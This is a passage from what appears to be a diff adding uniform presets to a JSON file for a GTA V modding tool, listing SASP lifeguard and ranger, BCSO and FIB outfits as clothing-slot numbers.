+"Top": "20:1", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "32:1", +"Pants": "90:11", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:5", +"Parachute": "49:1" + }, + { +"Name": "Female SASP Ranger Raincoat", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "190:5", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "32:1", +"Pants": "90:11", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:5", +"Parachute": "37:1" + }, + { +"Name": "Female SASP Lifeguard Class A", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASP", +"Hat": "5:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "203:7", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "32:1", +"Pants": "90:13", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "37:1" + }, + { +"Name": "Female SASP Lifeguard Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "196:7", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "32:1", +"Pants": "90:13", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "37:1" + }, + { +"Name": "Female SASP Lifeguard Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:7", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "32:1", +"Pants": "90:13", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "37:1" + }, + { +"Name": "Female SASP Lifeguard Turtleneck", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "199:7", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "32:1", +"Pants": "90:13", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "37:1" + }, + { +"Name": "Female SASP Lifeguard Pullover", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "224:4", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "32:1", +"Pants": "90:13", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "49:1" + }, + { +"Name": "Female SASP Lifeguard Polo", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASP", +"Hat": "135:20", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "336:11", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "32:1", +"Pants": "90:13", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female SASP Lifeguard Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASP", +"Hat": "135:20", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "20:3", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "32:1", +"Pants": "90:13", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:6", +"Parachute": "49:1" + }, + { +"Name": "Female SASP Lifeguard Coat", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASP", +"Hat": "6:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "275:5", +"UpperSkin": "37:1", +"Decal": "1:1", +"UnderCoat": "32:1", +"Pants": "90:13", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "17:1", +"Parachute": "65:10" + }, + { +"Name": "Female SASP Lifeguard Raincoat", +"Gender": "Female", +"Category": "EUP", +"Category2": "SASP", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "190:6", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "32:1", +"Pants": "90:13", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:6", +"Parachute": "37:1" + }, + { +"Name": "Male BCSO Uniform Class A", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "14:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "201:4", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "39:1", +"Pants": "23:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "55:1" + }, + { +"Name": "Male BCSO Uniform Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "194:4", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "39:1", +"Pants": "23:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "55:1" + }, + { +"Name": "Male BCSO Uniform Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:4", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "39:1", +"Pants": "23:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "14:1", +"Parachute": "55:1" + }, + { +"Name": "Male BCSO Pullover", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "240:6", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "39:1", +"Pants": "23:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "19:1", +"Parachute": "21:1" + }, + { +"Name": "Female BCSO Class A", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "14:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "203:4", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "52:1", +"Pants": "4:8", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "55:1" + }, + { +"Name": "Female BCSO Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "196:4", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "52:1", +"Pants": "4:8", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "55:1" + }, + { +"Name": "Female BCSO Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:4", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "52:1", +"Pants": "4:8", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "55:1" + }, + { +"Name": "Female BCSO Pullover", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "224:6", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "52:1", +"Pants": "4:8", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male BCSO Coat", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "266:3", +"UpperSkin": "39:1", +"Decal": "1:1", +"UnderCoat": "39:1", +"Pants": "23:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "65:4" + }, + { +"Name": "Female BCSO Coat", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "9:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "275:3", +"UpperSkin": "37:1", +"Decal": "1:1", +"UnderCoat": "52:1", +"Pants": "4:8", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "17:1", +"Parachute": "65:4" + }, + { +"Name": "Male BCSO Jacket", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "31:5", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "39:1", +"Pants": "23:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "29:2", +"Parachute": "49:1" + }, + { +"Name": "Female BCSO Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "280:5", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "52:1", +"Pants": "4:8", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:2", +"Parachute": "49:1" + }, + { +"Name": "Male BCSO Raincoat", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "136:7", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "188:3", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "66:2", +"Pants": "23:9", +"Shoes": "52:1", +"Accessories": "9:1", +"Armor": "35:1", +"Parachute": "55:1" + }, + { +"Name": "Female BCSO Raincoat", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "190:3", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "52:1", +"Pants": "4:8", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:2", +"Parachute": "55:1" + }, + { +"Name": "Male BCSO Motorcycle Class A", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "18:4", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "201:4", +"UpperSkin": "21:1", +"Decal": "1:1", +"UnderCoat": "39:1", +"Pants": "33:3", +"Shoes": "14:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "55:1" + }, + { +"Name": "Male BCSO Motorcycle Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "18:4", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "194:4", +"UpperSkin": "21:1", +"Decal": "1:1", +"UnderCoat": "39:1", +"Pants": "33:3", +"Shoes": "14:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "55:1" + }, + { +"Name": "Male BCSO Motorcycle Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "18:4", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:4", +"UpperSkin": "27:1", +"Decal": "1:1", +"UnderCoat": "39:1", +"Pants": "33:3", +"Shoes": "14:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "55:1" + }, + { +"Name": "Female BCSO Motorcycle Class A", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "18:4", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "203:4", +"UpperSkin": "24:1", +"Decal": "1:1", +"UnderCoat": "52:1", +"Pants": "32:3", +"Shoes": "35:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "55:1" + }, + { +"Name": "Female BCSO Motorcycle Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "18:4", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "196:4", +"UpperSkin": "24:1", +"Decal": "1:1", +"UnderCoat": "52:1", +"Pants": "32:3", +"Shoes": "35:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "55:1" + }, + { +"Name": "Female BCSO Motorcycle Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "18:4", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:4", +"UpperSkin": "29:1", +"Decal": "1:1", +"UnderCoat": "52:1", +"Pants": "32:3", +"Shoes": "35:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "55:1" + }, + { +"Name": "Male BCSO Suit", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "5:6", +"UpperSkin": "13:1", +"Decal": "1:1", +"UnderCoat": "180:7", +"Pants": "23:6", +"Shoes": "21:1", +"Accessories": "13:16", +"Armor": "24:5", +"Parachute": "30:9" + }, + { +"Name": "Female BCSO Suit", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "7:16", +"UpperSkin": "6:1", +"Decal": "1:1", +"UnderCoat": "21:1", +"Pants": "24:6", +"Shoes": "14:1", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "61:1" + }, + { +"Name": "Male BCSO Detective", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "33:2", +"Mask": "1:1", +"Top": "293:7", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "17:2", +"Pants": "23:6", +"Shoes": "21:1", +"Accessories": "13:16", +"Armor": "24:5", +"Parachute": "30:9" + }, + { +"Name": "Female BCSO Detective", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "367:1", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "15:1", +"Pants": "4:10", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "26:1", +"Parachute": "29:9" + }, + { +"Name": "Male BCSO Armor Protection", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "33:2", +"Mask": "108:1", +"Top": "293:7", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "133:6", +"Pants": "23:6", +"Shoes": "21:1", +"Accessories": "120:2", +"Armor": "24:5", +"Parachute": "30:9" + }, + { +"Name": "Female BCSO Armor Protection", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "333:1", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "162:4", +"Pants": "4:10", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "26:1", +"Parachute": "1:1" + }, + { +"Name": "Male BCSO Crime Scene Jacket", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "308:3", +"UpperSkin": "89:1", +"Decal": "1:1", +"UnderCoat": "180:7", +"Pants": "23:6", +"Shoes": "21:1", +"Accessories": "13:16", +"Armor": "1:1", +"Parachute": "61:1" + }, + { +"Name": "Female BCSO Crime Scene Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "319:3", +"UpperSkin": "106:1", +"Decal": "1:1", +"UnderCoat": "24:7", +"Pants": "4:64", +"Shoes": "30:1", +"Accessories": "7:1", +"Armor": "26:1", +"Parachute": "1:1" + }, + { +"Name": "Female BCSO Plain Clothes", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "10:11", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "10:1", +"Pants": "6:12", +"Shoes": "4:10", +"Accessories": "1:1", +"Armor": "1:1", +"Parachute": "61:1" + }, + { +"Name": "Male BCSO Raid Jacket", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "136:6", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "122:1", +"Top": "326:14", +"UpperSkin": "153:1", +"Decal": "1:1", +"UnderCoat": "103:18", +"Pants": "1:5", +"Shoes": "52:1", +"Accessories": "7:1", +"Armor": "18:4", +"Parachute": "61:1" + }, + { +"Name": "Female BCSO Raid Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "319:14", +"UpperSkin": "8:1", +"Decal": "1:1", +"UnderCoat": "58:2", +"Pants": "4:64", +"Shoes": "63:21", +"Accessories": "7:1", +"Armor": "22:4", +"Parachute": "61:1" + }, + { +"Name": "Male BCSO Task Force", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "136:6", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "4:3", +"Mask": "122:1", +"Top": "74:19", +"UpperSkin": "152:1", +"Decal": "1:1", +"UnderCoat": "89:1", +"Pants": "1:5", +"Shoes": "52:1", +"Accessories": "7:1", +"Armor": "8:2", +"Parachute": "52:1" + }, + { +"Name": "Female BCSO Task Force", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "135:6", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "122:1", +"Top": "225:2", +"UpperSkin": "172:1", +"Decal": "1:1", +"UnderCoat": "82:1", +"Pants": "6:12", +"Shoes": "63:21", +"Accessories": "7:1", +"Armor": "8:2", +"Parachute": "1:1" + }, + { +"Name": "Male BCSO Bicycle Uniform", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "50:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "95:2", +"UpperSkin": "20:1", +"Decal": "1:1", +"UnderCoat": "38:1", +"Pants": "13:2", +"Shoes": "3:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "49:1" + }, + { +"Name": "Female BCSO Bicycle Uniform", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "48:1", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "86:2", +"UpperSkin": "32:1", +"Decal": "1:1", +"UnderCoat": "3:1", +"Pants": "15:4", +"Shoes": "11:1", +"Accessories": "9:1", +"Armor": "17:1", +"Parachute": "49:1" + }, + { +"Name": "Male BCSO Harbor Patrol", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "0:0", +"Glasses": "16:10", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "95:2", +"UpperSkin": "1:1", +"Decal": "1:1", +"UnderCoat": "88:1", +"Pants": "88:15", +"Shoes": "25:1", +"Accessories": "2:1", +"Armor": "9:1", +"Parachute": "49:1" + }, + { +"Name": "Female BCSO Harbor Patrol", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "0:0", +"Glasses": "26:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "86:2", +"UpperSkin": "15:1", +"Decal": "1:1", +"UnderCoat": "66:1", +"Pants": "91:15", +"Shoes": "25:1", +"Accessories": "9:1", +"Armor": "10:1", +"Parachute": "49:1" + }, + { +"Name": "Male BCSO K-9 Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "136:24", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "167:1", +"UpperSkin": "5:1", +"Decal": "12:2", +"UnderCoat": "39:1", +"Pants": "88:15", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "49:1" + }, + { +"Name": "Male BCSO K-9 Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "136:24", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "184:1", +"UpperSkin": "12:1", +"Decal": "16:8", +"UnderCoat": "39:1", +"Pants": "88:15", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "15:1", +"Parachute": "49:1" + }, + { +"Name": "Female BCSO K-9 Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "135:24", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "164:1", +"UpperSkin": "4:1", +"Decal": "11:2", +"UnderCoat": "52:1", +"Pants": "91:15", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female BCSO K-9 Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "135:24", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "186:1", +"UpperSkin": "10:1", +"Decal": "15:8", +"UnderCoat": "52:1", +"Pants": "91:15", +"Shoes": "26:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male BCSO SWAT Uniform", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "151:2", +"Glasses": "22:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "221:4", +"UpperSkin": "180:1", +"Decal": "1:1", +"UnderCoat": "93:2", +"Pants": "32:2", +"Shoes": "26:1", +"Accessories": "111:1", +"Armor": "26:3", +"Parachute": "49:1" + }, + { +"Name": "Female BCSO SWAT Uniform", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "150:2", +"Glasses": "23:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "231:4", +"UpperSkin": "216:1", +"Decal": "1:1", +"UnderCoat": "104:2", +"Pants": "31:2", +"Shoes": "26:1", +"Accessories": "82:1", +"Armor": "28:3", +"Parachute": "49:1" + }, + { +"Name": "Male BCSO Pilot Uniform", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "80:3", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "109:3", +"UpperSkin": "97:1", +"Decal": "1:1", +"UnderCoat": "44:3", +"Pants": "65:2", +"Shoes": "25:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Female BCSO Pilot Uniform", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "79:3", +"Glasses": "14:1", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "100:3", +"UpperSkin": "37:1", +"Decal": "1:1", +"UnderCoat": "31:3", +"Pants": "67:2", +"Shoes": "25:1", +"Accessories": "9:1", +"Armor": "1:1", +"Parachute": "49:1" + }, + { +"Name": "Male BCSO Vintage Class A", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "34:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "201:16", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "45:1", +"Pants": "11:16", +"Shoes": "52:1", +"Accessories": "61:1", +"Armor": "1:1", +"Parachute": "55:1" + }, + { +"Name": "Male BCSO Vintage Class B", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "34:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "194:17", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "45:1", +"Pants": "11:16", +"Shoes": "52:1", +"Accessories": "61:1", +"Armor": "1:1", +"Parachute": "55:1" + }, + { +"Name": "Male BCSO Vintage Class C", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "34:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:17", +"UpperSkin": "12:1", +"Decal": "1:1", +"UnderCoat": "45:1", +"Pants": "11:16", +"Shoes": "52:1", +"Accessories": "61:1", +"Armor": "1:1", +"Parachute": "55:1" + }, + { +"Name": "Female BCSO Vintage Class A", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "33:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "203:16", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "53:1", +"Pants": "4:15", +"Shoes": "53:1", +"Accessories": "34:2", +"Armor": "1:1", +"Parachute": "55:1" + }, + { +"Name": "Female BCSO Vintage Class B", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "33:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "196:17", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "53:1", +"Pants": "4:15", +"Shoes": "53:1", +"Accessories": "34:2", +"Armor": "1:1", +"Parachute": "55:1" + }, + { +"Name": "Female BCSO Vintage Class C", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "33:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:17", +"UpperSkin": "10:1", +"Decal": "1:1", +"UnderCoat": "53:1", +"Pants": "4:15", +"Shoes": "53:1", +"Accessories": "34:2", +"Armor": "1:1", +"Parachute": "55:1" + }, + { +"Name": "Male BCSO Vintage Jacket", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "34:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "31:8", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "39:1", +"Pants": "11:16", +"Shoes": "52:1", +"Accessories": "61:1", +"Armor": "20:10", +"Parachute": "49:1" + }, + { +"Name": "Female BCSO Vintage Jacket", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "33:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "280:8", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "52:1", +"Pants": "4:15", +"Shoes": "53:1", +"Accessories": "9:1", +"Armor": "31:10", +"Parachute": "49:1" + }, + { +"Name": "Male BCSO Vintage Coat", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "31:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "267:1", +"UpperSkin": "5:1", +"Decal": "1:1", +"UnderCoat": "45:1", +"Pants": "11:16", +"Shoes": "52:1", +"Accessories": "61:1", +"Armor": "1:1", +"Parachute": "65:19" + }, + { +"Name": "Female BCSO Vintage Coat", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "33:2", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "276:1", +"UpperSkin": "4:1", +"Decal": "1:1", +"UnderCoat": "53:1", +"Pants": "4:15", +"Shoes": "53:1", +"Accessories": "34:2", +"Armor": "1:1", +"Parachute": "65:19" + }, + { +"Name": "Male BCSO Vintage Motorcycle", +"Gender": "Male", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "18:5", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "191:17", +"UpperSkin": "20:1", +"Decal": "1:1", +"UnderCoat": "45:1", +"Pants": "33:4", +"Shoes": "14:1", +"Accessories": "61:1", +"Armor": "1:1", +"Parachute": "55:1" + }, + { +"Name": "Female BCSO Vintage Motorcycle", +"Gender": "Female", +"Category": "EUP", +"Category2": "BCSO", +"Hat": "18:5", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "193:17", +"UpperSkin": "32:1", +"Decal": "1:1", +"UnderCoat": "53:1", +"Pants": "32:4", +"Shoes": "35:1", +"Accessories": "34:2", +"Armor": "1:1", +"Parachute": "55:1" + }, + { +"Name": "Male FIB Suit", +"Gender": "Male", +"Category": "EUP", +"Category2": "FIB", +"Hat": "0:0", +"Glasses": "0:0", +"Ear": "0:0", +"Watch": "0:0", +"Mask": "1:1", +"Top": "11:1", +"UpperSkin": "5:1", +"Decal": "1:1", 